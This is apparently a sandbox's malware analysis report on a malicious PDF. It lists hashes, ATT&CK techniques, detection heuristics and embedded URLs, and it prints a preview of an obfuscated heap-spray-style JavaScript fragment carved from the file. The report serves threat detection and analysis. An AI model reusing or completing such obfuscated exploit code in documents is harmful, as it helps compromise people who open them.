Malicious PDF — malware analysis report

Static analysis result for SHA-256 cf9151f1aa8cda68…

MALICIOUS

PDF

153.0 KB First seen: 2026-05-10
MD5: 556031b88f4d3787c3fc52de29109fae SHA-1: fdca30a3248186338c3d49d1f36a77a63dd28656 SHA-256: cf9151f1aa8cda68122eea82f73f658f64926b8bc95894fb89181dde84f37bb3
78 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript and utilizes ASCIIHexDecode filters, indicating an attempt to exploit vulnerabilities. The embedded JavaScript is likely responsible for downloading and executing a second-stage payload. While the specific family is not identifiable, the techniques used suggest a common PDF-based exploit delivery method.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9995

Heuristics 6

  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com Referenced by PDF JavaScript
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x25BDA 782 bytes
SHA-256: 383499ce27564e52d6ba66d79f543cbacc808c2ffd1bfce5eefdbd7877091afb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
6 of 8 identifiers look randomly generated (e.g. 'qvuZEuFdoKedCNsIrqbtWGdGOINPowRSNrzgjvft') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
qzTJJJkSQYWYkgQiosPtSACCtOAXgEGLZKg = Y.substring(0, (0x0c0c-0x24)/2);
qzTJJJkSQYWYkgQiosPtSACCtOAXgEGLZKg += qvuZEuFdoKedCNsIrqbtWGdGOINPowRSNrzgjvftuBHzzVPoNpMaaoYOOnZzIuIWuJQIGjNPJzFcBqVYrEaXMbifz;
qzTJJJkSQYWYkgQiosPtSACCtOAXgEGLZKg += Y;
LfSvceilMDkzQkBOjfVFHMoYAqGZJTQPOLnVVMvBSIMu = qzTJJJkSQYWYkgQiosPtSACCtOAXgEGLZKg.substring(0, 65536/2);
HHBKFJxYmDurYTZiDdzegBGvMWhirsUEJTgBRTLHOOxZCBYDGsPmFLIuskFgbHSjmlA = LfSvceilMDkzQkBOjfVFHMoYAqGZJTQPOLnVVMvBSIMu.substring(0, 0x80000 - (0x1020-0x08) / 2);
for (mfxNdhIXXnyABTsTKFNUAhuvuriHJYTtqG=0;mfxNdhIXXnyABTsTKFNUAhuvuriHJYTtqG<0x1f0;mfxNdhIXXnyABTsTKFNUAhuvuriHJYTtqG++) qaShWSPbWNIUDeWyuSsuqFczgorYjhhPHtwzmSlzntM[mfxNdhIXXnyABTsTKFNUAhuvuriHJYTtqG]=HHBKFJxYmDurYTZiDdzegBGvMWhirsUEJTgBRTLHOOxZCBYDGsPmFLIuskFgbHSjmlA+"s";

Open this report in the interactive analyzer, or submit your own file for analysis.